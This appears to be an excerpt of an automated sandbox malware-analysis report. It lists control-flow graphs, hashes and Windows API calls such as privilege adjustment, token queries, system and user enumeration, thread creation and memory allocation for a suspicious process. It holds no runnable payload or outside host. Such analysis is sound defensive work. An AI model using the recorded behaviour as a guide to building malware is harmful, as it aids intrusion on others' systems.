                                                                                                                                                                                • Instruction ID: da1282e7f701a949ab6469d00cd263f12d24f2457289bfc3cd09ba90d0383fe5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                • Instruction Fuzzy Hash: 74B1323054DA468BCB299B2C84C4675B7E6FFA5310F28C6DDD8AF87176EE249C02C356
                                                                                                                                                                                Function 00B75B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 b75b8f-b75c20 call b853f0 call ba8358 call b90320 call b781c0 141 b75c26 131->141 142 b75cf4-b75d08 call ba72ec 131->142 141->142 143 b75c2c-b75c2f 141->143 146 b75c87-b75dc8 call b75e60 call b75990 142->146 147 b75d0e 142->147 159 b75dcd 146->159 147->146 149 b75d14-b75d18 147->149 153 b75c65 149->153 154 b75daf-b75db6 call b752d0 149->154 156 b75c67 153->156 157 b75ca3 call b75df0 153->157 165 b75c30-b75c39 154->165 166 b75dbc 154->166 156->157 161 b75c69-b75c9d 156->161 170 b75c45-b75d6d call b91520 157->170 159->159 179 b75c85 161->179 180 b75c9f 161->180 182 b75bf7 165->182 183 b75cb9-b75cbd 165->183 167 b75dbe 166->167 168 b75d7d-b75d89 166->168 167->168 178 b75d9b 167->178 176 b75d94 168->176 177 b75d8b-b75d92 168->177 188 b75bfd-b75c06 170->188 193 b75d73 170->193 176->143 191 b75cb3 176->191 177->176 184 b75d9c 177->184 178->184 179->146 180->179 186 b75ca1 180->186 182->183 182->188 189 b75d56-b75d5b CreateThread 183->189 190 b75cc3 183->190 196 b75da5-b75da8 184->196 186->157 188->196 198 b75d1f-b75d45 189->198 199 b75c7e 189->199 190->189 194 b75cc9 190->194 191->143 191->183 193->188 195 b75d79-b75d7b 193->195 194->189 195->168 196->154 202 b75d47 198->202 203 b75cd4-b75cea CreateThread CloseHandle 198->203 199->198 200 b75c84 199->200 200->179 202->203 203->177 204 b75cf0-b75d4d 203->204 204->176
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction ID: acc0ec5d0c752b228d3e641b54d7c4a6d17dab6da0937feaa78964d02e40c548
                                                                                                                                                                                • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction Fuzzy Hash: A441F62060CF098FDB7A9B3C8899B7936D0EB99310F54C5F6903ECB1A1DEE48C419746
                                                                                                                                                                                Function 00B75D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 207 b75d22-b75d45 208 b75d47 207->208 209 b75cd4-b75cea CreateThread CloseHandle 207->209 208->209 210 b75cf0-b75d4d 209->210 211 b75d8b-b75d92 209->211 214 b75d94 210->214 211->214 215 b75d9c 211->215 218 b75cb3 214->218 219 b75c2c-b75c2f 214->219 217 b75da5-b75db6 call b752d0 215->217 231 b75c30-b75c39 217->231 232 b75dbc 217->232 218->219 220 b75cb9-b75cbd 218->220 222 b75d56-b75d5b CreateThread 220->222 223 b75cc3 220->223 228 b75d1f-b75d45 222->228 229 b75c7e 222->229 223->222 226 b75cc9 223->226 226->222 228->208 228->209 229->228 230 b75c84-b75dc8 call b75e60 call b75990 229->230 250 b75dcd 230->250 231->220 243 b75bf7 231->243 233 b75dbe 232->233 234 b75d7d-b75d89 232->234 233->234 242 b75d9b 233->242 234->211 234->214 242->215 243->220 245 b75bfd-b75c06 243->245 245->217 250->250
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: 4d22d97521ccfd7e8ce7e737a742bd95a344cf6cbb0bdd76c1625732a472f004
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0F621A1CF4945DB3D8638889977A61C1E799321F65CBFED13FC90D0DEE54901A205
                                                                                                                                                                                Function 00B75D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 251 b75d50-b75d5b CreateThread 252 b75c78 251->252 253 b75d1f-b75d45 252->253 254 b75c7e 252->254 258 b75d47 253->258 259 b75cd4-b75cea CreateThread CloseHandle 253->259 254->253 255 b75c84-b75dc8 call b75e60 call b75990 254->255 276 b75dcd 255->276 258->259 260 b75cf0-b75d4d 259->260 261 b75d8b-b75d92 259->261 265 b75d94 260->265 261->265 266 b75d9c 261->266 272 b75cb3 265->272 273 b75c2c-b75c2f 265->273 271 b75da5-b75db6 call b752d0 266->271 283 b75c30-b75c39 271->283 284 b75dbc 271->284 272->273 275 b75cb9-b75cbd 272->275 278 b75d56-b75d5b CreateThread 275->278 279 b75cc3 275->279 276->276 278->252 279->278 281 b75cc9 279->281 281->278 283->275 292 b75bf7 283->292 285 b75dbe 284->285 286 b75d7d-b75d89 284->286 285->286 291 b75d9b 285->291 286->261 286->265 291->266 292->275 293 b75bfd-b75c06 292->293 293->271
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: 3805d46fb4ebda9422e0e51f6ac95413c565d62f8b317339441cb61851183002
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: C2B01201028F8B45003A1B30054866855C4EE46634D76AFFC9F7B068D2DCC00C066320
                                                                                                                                                                                Function 00B75990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 295 b75990-b7599b 297 b75a33-b75a61 call ba9b00 295->297 298 b759a1 295->298 308 b75ab4-b75aba call b91080 297->308 309 b75a63 297->309 298->297 300 b759a7-b759ab 298->300 304 b759b1-b759f3 call ba2320 300->304 305 b75a59 300->305 304->305 326 b759f5-b759fa 304->326 306 b75a25-b75a2d 305->306 307 b75a5b 305->307 315 b75a70-b75a7b 306->315 316 b75a2f 306->316 307->306 318 b75a23 307->318 327 b75a83-b75a88 call b75df0 308->327 328 b75a13 308->328 309->308 313 b75a65 309->313 313->315 319 b75a16-b75a1e call b91470 315->319 320 b75a7d 315->320 316->313 324 b75a24 318->324 335 b75a96-b75ac2 319->335 320->319 325 b75a7f-b75a81 320->325 325->327 330 b75a51-b75a54 call ba233c 326->330 331 b759fc 326->331 338 b75a8d VirtualAlloc 327->338 328->327 334 b75a15 328->334 330->305 331->330 332 b759fe-b75a02 331->332 332->330 334->319 335->324 339 b75ac8 335->339 338->335 339->324 340 b75ace 339->340 340->297
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: 5363d16ca33d0d830b63fd55cf8a5763aee44cdc8f7bd1c9d4b0556087875321
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0221FB3191DE888FC77A931C44D12B526E2F795324F58C3FBD0BEC7192D9E84E059252
                                                                                                                                                                                Function 00B78245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 342 b78245-b78247 343 b782d2-b782d7 342->343 344 b7824d-b7824f 342->344 346 b78306-b78309 343->346 345 b78251-b78260 call ba72f4 344->345 353 b78390-b78393 345->353 348 b7832e-b78330 346->348 349 b7830b-b78311 CloseHandle 346->349 351 b78332 348->351 352 b782dd-b782e3 348->352 349->348 351->352 356 b78334 351->356 354 b783a3-b783a4 352->354 355 b782e9 352->355 357 b7827e 353->357 358 b78399 353->358 360 b7f524-b7f52e 354->360 355->354 359 b782ef 355->359 356->360 357->349 362 b78284 357->362 358->357 363 b7839f-b783a1 358->363 366 b782f0-b7831c 359->366 361 b7f807 360->361 364 b7f8df-b7f8e0 361->364 365 b7f80d 361->365 362->348 363->354 370 b815a5-b815aa 364->370 365->364 367 b7f813 365->367 375 b781e5 366->375 376 b78322 366->376 372 b7f78f 367->372 373 b7f81b 367->373 374 b815ae-b815af 370->374 372->373 377 b7f795 372->377 373->364 378 b815b2-b815b7 374->378 379 b782a3-b782a5 375->379 380 b781eb 375->380 376->375 381 b78328-b7832c 376->381 377->361 382 b815ba-b815c1 378->382 386 b782ab 379->386 387 b783f9 379->387 383 b782b2-b782bc 380->383 384 b781f1 380->384 381->348 385 b782c5-b782c8 381->385 388 b81750-b817a2 call ba72f4 382->388 389 b815c7-b815d2 382->389 383->385 393 b78357-b7836f GetTokenInformation 383->393 384->383 391 b781f7-b7828e 384->391 385->387 390 b782ce 385->390 386->387 392 b782b1 386->392 387->343 394 b783ff 387->394 396 b81620-b81623 389->396 397 b815d4-b815d6 389->397 400 b782d0 390->400 401 b7828f-b78303 call ba72ec 390->401 392->383 410 b78376-b7837b 393->410 394->360 403 b816a0-b816b4 396->403 404 b81625-b81628 396->404 398 b815dc-b815df 397->398 399 b81670-b81684 397->399 398->382 406 b815e1-b815f6 398->406 399->370 409 b8168a-b8168d 399->409 400->343 400->401 401->346 436 b7834f-b78355 401->436 411 b816f4-b816f5 403->411 412 b816b6-b816b9 403->412 404->382 408 b8162a-b81636 404->408 413 b815fc-b81600 406->413 414 b816d2-b816d7 406->414 416 b81638-b81640 408->416 417 b816dc-b816ec 408->417 418 b8172f-b81738 409->418 419 b81693-b81697 409->419 410->366 420 b78381 410->420 424 b816fe-b8170c 411->424 421 b8173a-b8173b 412->421 422 b816bb 412->422 413->424 425 b81606-b81618 413->425 414->374 428 b8170e-b81727 416->428 429 b81646-b8165f 416->429 417->389 426 b816f2 417->426 430 b8173f-b81740 418->430 423 b816bf-b816cd 419->423 420->366 431 b78387 420->431 421->430 422->423 432 b81744-b81748 424->432 425->378 426->388 428->389 433 b8172d 428->433 429->389 434 b81665 429->434 430->432 431->353 435 b78277-b7827a 431->435 433->388 434->388 437 b78241 435->437 438 b7827c 435->438 440 b78212-b7821a GetTokenInformation 436->440 441 b78341 436->441 437->345 437->410 438->357 438->437 443 b78220-b78234 440->443 444 b783af 440->444 441->440 442 b78347 441->442 442->416 446 b7834d 442->446 451 b783d7-b783dd 443->451 452 b7823a 443->452 444->345 445 b783b5 444->445 445->345 448 b783bb-b783ca 445->448 446->436 448->435 457 b783d0 448->457 451->387 452->451 453 b78240 452->453 455 b8b32e-b8b330 453->455 458 b8b300 455->458 459 b8b332-b8b337 call ba72f4 455->459 457->435 460 b783d6 457->460 463 b8b2fd 458->463 464 b8b302 458->464 459->458 468 b8b339 459->468 466 b8b2ff 463->466 467 b8b305 463->467 469 b8b308-b8b315 466->469 467->469 470 b8b322-b8b32d 467->470 468->458 471 b8b33b-b8b33f 468->471 469->467 473 b8b317 469->473 470->455 471->469 473->463
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction ID: 7040228e0e7aa998792667489d42ffca5f50a51897c903de6c069facce530e83
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 07F0F43454DA42CFC62A871C909843A6BE1EF51701B5AC0DEE46ECB113CE14CC05E7AB
                                                                                                                                                                                Function 00B783E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 605 b783e7-b783e9 606 b782c5-b782c8 605->606 607 b783ef 605->607 608 b782ce 606->608 609 b783f9 606->609 607->606 610 b783f5-b783f7 607->610 611 b782d0 608->611 612 b7828f-b78303 call ba72ec 608->612 613 b782d2-b782d7 609->613 614 b783ff 609->614 610->609 611->612 611->613 616 b78306-b78309 612->616 631 b7834f-b78355 612->631 613->616 617 b7f524-b7f52e 614->617 620 b7832e-b78330 616->620 621 b7830b-b78311 CloseHandle 616->621 618 b7f807 617->618 623 b7f8df-b7f8e0 618->623 624 b7f80d 618->624 625 b78332 620->625 626 b782dd-b782e3 620->626 621->620 634 b815a5-b815aa 623->634 624->623 627 b7f813 624->627 625->626 630 b78334 625->630 628 b783a3-b783a4 626->628 629 b782e9 626->629 636 b7f78f 627->636 637 b7f81b 627->637 628->617 629->628 635 b782ef 629->635 630->617 638 b78212-b7821a GetTokenInformation 631->638 639 b78341 631->639 640 b815ae-b815af 634->640 646 b782f0-b7831c 635->646 636->637 641 b7f795 636->641 637->623 643 b78220-b78234 638->643 644 b783af 638->644 639->638 642 b78347 639->642 645 b815b2-b815b7 640->645 641->618 649 b81638-b81640 642->649 650 b7834d 642->650 673 b783d7-b783dd 643->673 674 b7823a 643->674 647 b783b5 644->647 648 b78251-b78256 call ba72f4 644->648 651 b815ba-b815c1 645->651 671 b781e5 646->671 672 b78322 646->672 647->648 655 b783bb-b783ca 647->655 662 b7825b-b78260 648->662 656 b8170e-b81727 649->656 657 b81646-b8165f 649->657 650->631 658 b81750-b817a2 call ba72f4 651->658 659 b815c7-b815d2 651->659 704 b78277-b7827a 655->704 705 b783d0 655->705 656->659 664 b8172d 656->664 657->659 665 b81665 657->665 667 b81620-b81623 659->667 668 b815d4-b815d6 659->668 675 b78390-b78393 662->675 664->658 665->658 676 b816a0-b816b4 667->676 677 b81625-b81628 667->677 669 b815dc-b815df 668->669 670 b81670-b81684 668->670 669->651 679 b815e1-b815f6 669->679 670->634 688 b8168a-b8168d 670->688 680 b782a3-b782a5 671->680 681 b781eb 671->681 672->671 682 b78328-b7832c 672->682 673->609 674->673 683 b78240 674->683 686 b7827e 675->686 687 b78399 675->687 689 b816f4-b816f5 676->689 690 b816b6-b816b9 676->690 677->651 684 b8162a-b81636 677->684 691 b815fc-b81600 679->691 692 b816d2-b816d7 679->692 680->609 702 b782ab 680->702 693 b782b2-b782bc 681->693 694 b781f1 681->694 682->606 682->620 701 b8b32e-b8b330 683->701 684->649 695 b816dc-b816ec 684->695 686->621 706 b78284 686->706 687->686 696 b7839f-b783a1 687->696 697 b8172f-b81738 688->697 698 b81693-b81697 688->698 707 b816fe-b8170c 689->707 699 b8173a-b8173b 690->699 700 b816bb 690->700 691->707 708 b81606-b81618 691->708 692->640 693->606 713 b78357-b7836f GetTokenInformation 693->713 694->693 709 b781f7-b7828e 694->709 695->659 711 b816f2 695->711 696->628 716 b8173f-b81740 697->716 710 b816bf-b816cd 698->710 699->716 700->710 717 b8b300 701->717 718 b8b332-b8b337 call ba72f4 701->718 702->609 712 b782b1 702->712 714 b78241 704->714 715 b7827c 704->715 705->704 719 b783d6 705->719 706->620 723 b81744-b81748 707->723 708->645 711->658 712->693 722 b78376-b7837b 713->722 714->648 714->722 715->686 715->714 716->723 725 b8b2fd 717->725 726 b8b302 717->726 718->717 732 b8b339 718->732 722->646 727 b78381 722->727 730 b8b2ff 725->730 731 b8b305 725->731 727->646 729 b78387 727->729 729->675 729->704 733 b8b308-b8b315 730->733 731->733 734 b8b322-b8b32d 731->734 732->717 735 b8b33b-b8b33f 732->735 733->731 737 b8b317 733->737 734->701 735->733 737->725
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: f7bd3321fa0fc9eaa66faf8d90dda4c74f701fc012e7e6e12b8ec862162b1e2b
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F0903459C942CB87398708948C53627E1EB61702B6DC0D9D47ECB263CE24DC05E76B
                                                                                                                                                                                Function 00B78318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 474 b78318-b7831c 475 b781e5 474->475 476 b78322 474->476 477 b782a3-b782a5 475->477 478 b781eb 475->478 476->475 479 b78328-b7832c 476->479 484 b782ab 477->484 485 b783f9 477->485 480 b782b2-b782bc 478->480 481 b781f1 478->481 482 b782c5-b782c8 479->482 483 b7832e-b78330 479->483 480->482 489 b78357-b7836f GetTokenInformation 480->489 481->480 487 b781f7-b7828e 481->487 482->485 486 b782ce 482->486 492 b78332 483->492 493 b782dd-b782e3 483->493 484->485 488 b782b1 484->488 490 b782d2-b782d7 485->490 491 b783ff 485->491 494 b782d0 486->494 495 b7828f-b78303 call ba72ec 486->495 488->480 505 b78376-b7837b 489->505 497 b78306-b78309 490->497 500 b7f524-b7f52e 491->500 492->493 501 b78334 492->501 498 b783a3-b783a4 493->498 499 b782e9 493->499 494->490 494->495 495->497 520 b7834f-b78355 495->520 497->483 504 b7830b-b78311 CloseHandle 497->504 498->500 499->498 506 b782ef 499->506 502 b7f807 500->502 501->500 508 b7f8df-b7f8e0 502->508 509 b7f80d 502->509 504->483 510 b78381 505->510 511 b782f0-b7831c 505->511 506->511 517 b815a5-b815aa 508->517 509->508 513 b7f813 509->513 510->511 514 b78387 510->514 511->475 511->476 522 b7f78f 513->522 523 b7f81b 513->523 518 b78277-b7827a 514->518 519 b78390-b78393 514->519 529 b815ae-b815af 517->529 524 b78241 518->524 525 b7827c 518->525 527 b7827e 519->527 528 b78399 519->528 531 b78212-b7821a GetTokenInformation 520->531 532 b78341 520->532 522->523 530 b7f795 522->530 523->508 524->505 536 b78251-b78260 call ba72f4 524->536 525->524 525->527 527->504 533 b78284 527->533 528->527 534 b7839f-b783a1 528->534 535 b815b2-b815b7 529->535 530->502 539 b78220-b78234 531->539 540 b783af 531->540 532->531 538 b78347 532->538 533->483 534->498 541 b815ba-b815c1 535->541 536->519 544 b81638-b81640 538->544 545 b7834d 538->545 565 b783d7-b783dd 539->565 566 b7823a 539->566 540->536 543 b783b5 540->543 546 b81750-b817a2 call ba72f4 541->546 547 b815c7-b815d2 541->547 543->536 549 b783bb-b783ca 543->549 550 b8170e-b81727 544->550 551 b81646-b8165f 544->551 545->520 553 b81620-b81623 547->553 554 b815d4-b815d6 547->554 549->518 586 b783d0 549->586 550->547 561 b8172d 550->561 551->547 562 b81665 551->562 558 b816a0-b816b4 553->558 559 b81625-b81628 553->559 555 b815dc-b815df 554->555 556 b81670-b81684 554->556 555->541 564 b815e1-b815f6 555->564 556->517 568 b8168a-b8168d 556->568 569 b816f4-b816f5 558->569 570 b816b6-b816b9 558->570 559->541 567 b8162a-b81636 559->567 561->546 562->546 571 b815fc-b81600 564->571 572 b816d2-b816d7 564->572 565->485 566->565 573 b78240 566->573 567->544 574 b816dc-b816ec 567->574 576 b8172f-b81738 568->576 577 b81693-b81697 568->577 581 b816fe-b8170c 569->581 578 b8173a-b8173b 570->578 579 b816bb 570->579 571->581 582 b81606-b81618 571->582 572->529 584 b8b32e-b8b330 573->584 574->547 583 b816f2 574->583 587 b8173f-b81740 576->587 580 b816bf-b816cd 577->580 578->587 579->580 588 b81744-b81748 581->588 582->535 583->546 589 b8b300 584->589 590 b8b332-b8b337 call ba72f4 584->590 586->518 591 b783d6 586->591 587->588 594 b8b2fd 589->594 595 b8b302 589->595 590->589 599 b8b339 590->599 597 b8b2ff 594->597 598 b8b305 594->598 600 b8b308-b8b315 597->600 598->600 601 b8b322-b8b32d 598->601 599->589 602 b8b33b-b8b33f 599->602 600->598 604 b8b317 600->604 601->584 602->600 604->594
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 00B7830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 00B78369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.3350267899.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_b70000_PerceptionSimulationService.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: 495f64b77fa130cebd8928c5cbf2779e0241479478b1722e6dbd03456dedd5f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 57F0903459D642CB8A358B18D48853537E0EF25751B6DC0D9D47EDB123CE24DD02E76B

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:0.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:6.8%
                                                                                                                                                                                Total number of Nodes:355
                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                execution_graph 50989 708370 21 API calls __startOneArgErrorHandling 50981 6c5df2 ReadFile 50729 6e7960 50733 6e78e1 50729->50733 50730 6e7924 GetWindowsDirectoryW 50730->50733 50734 6e78c0 50730->50734 50731 6e7b41 GetLastError 50731->50733 50732 6e7bc4 GetWindowsDirectoryW 50733->50729 50733->50730 50733->50731 50733->50732 50733->50734 50735 6e7d75 50733->50735 50736 6e7dd0 GetUserNameW 50733->50736 50739 6e809e GetLastError 50733->50739 50740 6e7ab1 50733->50740 50741 6e8019 GetVolumeInformationW 50733->50741 50742 6e7f6f 50733->50742 50743 6e8048 50733->50743 50748 6e7bb6 50733->50748 50750 6e8063 GetUserNameW 50733->50750 50752 6e78c7 GetVolumeInformationW 50733->50752 50753 6e7eee GetComputerNameW 50733->50753 50754 6e7e1a GetLastError 50733->50754 50755 6c482b 46 API calls _strlen 50735->50755 50736->50733 50738 6e7d7a 50740->50742 50740->50748 50741->50743 50756 6c482b 46 API calls _strlen 50742->50756 50757 6c482b 46 API calls _strlen 50743->50757 50746 6e7f79 50747 6e7c96 50748->50732 50748->50747 50749 6e804d 50750->50733 50751 6e8071 50750->50751 50752->50733 50752->50734 50753->50733 50755->50738 50756->50746 50757->50749 50937 7080e0 21 API calls 50983 6c5c10 74 API calls 2 library calls 50947 6c5c10 ReadFile SetFilePointerEx 50984 6c5c10 77 API calls 2 library calls 50928 6c5074 VirtualAlloc 50959 6c49f0 GetUserDefaultLangID GetUserDefaultUILanguage 51006 6c5c66 73 API calls 2 library calls 50726 6c5bc0 50727 6c5bcd VirtualAlloc 50726->50727 50728 6c5bc9 50726->50728 50728->50727 50963 6c8359 29 API calls 50930 701845 11 API calls _abort 50951 6c5550 89 API calls 50985 6c9ad0 ReadFile SetFilePointerEx 50986 6ca6d0 27 API calls 50952 6ca52c GetFileSize 50940 6c58ab RtlExitUserThread 50976 6c5c10 75 API calls 2 library calls 50997 6c52e9 CloseHandle 50966 7021aa 51 API calls 3 library calls 50953 6c1130 GetPEB 51008 6ff38c 40 API calls 2 library calls 50967 6c5c10 ReadFile SetFilePointerEx MultiByteToWideChar _strlen 50999 6ce300 ReadFile SetFilePointerEx WriteFile ReadFile 50979 70661e RtlUnwind 50758 6c8303 50759 6c82bc 50758->50759 50760 6c827c GetTokenInformation 50759->50760 50786 6c5c10 _strlen 50759->50786 50761 6c828e GetLastError 50760->50761 50762 6c814b 50760->50762 50761->50762 50763 6c81ea CloseHandle 50762->50763 50764 6c8188 50762->50764 50766 6c7360 50762->50766 50770 6c6cc8 50762->50770 50763->50766 50765 6c7023 50772 6f1f67 50765->50772 50774 6f1c92 RtlAdjustPrivilege 50765->50774 50765->50786 50795 6f1cd1 NtQuerySystemInformation 50765->50795 50766->50770 50766->50786 50790 6c5d9e 50766->50790 50767 6c716d 50767->50765 50768 6c5f1c SetFilePointerEx 50767->50768 50769 6c6da0 _strlen 50773 6e3658 GetFileSizeEx 50769->50773 50776 6e522a 50769->50776 50769->50786 50788 6e3047 50769->50788 50796 6e4bb4 GetTickCount 50769->50796 50799 6e4341 50769->50799 50815 6e45b6 50769->50815 50816 6e46a3 50769->50816 50819 6e2de7 50769->50819 50820 6e3ee3 CloseHandle 50769->50820 50823 6e44b4 CreateFileW 50769->50823 50829 6e2421 50769->50829 50833 6e29c4 50769->50833 50842 6e49b4 50769->50842 50850 6e3ec6 50769->50850 50852 6e428f 50769->50852 50859 6e338d 50769->50859 50869 6c5dfe 50769->50869 50870 6e296b _wcslen 50769->50870 50879 6e382e 50769->50879 50770->50765 50770->50767 50770->50769 50770->50786 50771 6c62e0 ReadFile SetFilePointerEx 50771->50850 50927 6c482b 46 API calls _strlen 50772->50927 50774->50765 50775 6cefff 50781 6cf007 SetFilePointerEx 50775->50781 50883 6ce381 50775->50883 50784 6e364a 50776->50784 50793 6e3566 50776->50793 50797 6e46bc 50776->50797 50777 6e2a4d GetEnvironmentVariableW 50779 6e2a9f GetTempPathW 50777->50779 50780 6e2a58 50777->50780 50782 6f1f70 50783 6f1f7e RtlExitUserThread 50782->50783 50792 6e3656 50784->50792 50784->50793 50785 6e2ad0 50791 6e2ad2 wsprintfW 50785->50791 50787 6e2b31 50802 6e3059 50788->50802 50881 6e3018 50788->50881 50789 6e2a40 50789->50786 50804 6e2a4c 50789->50804 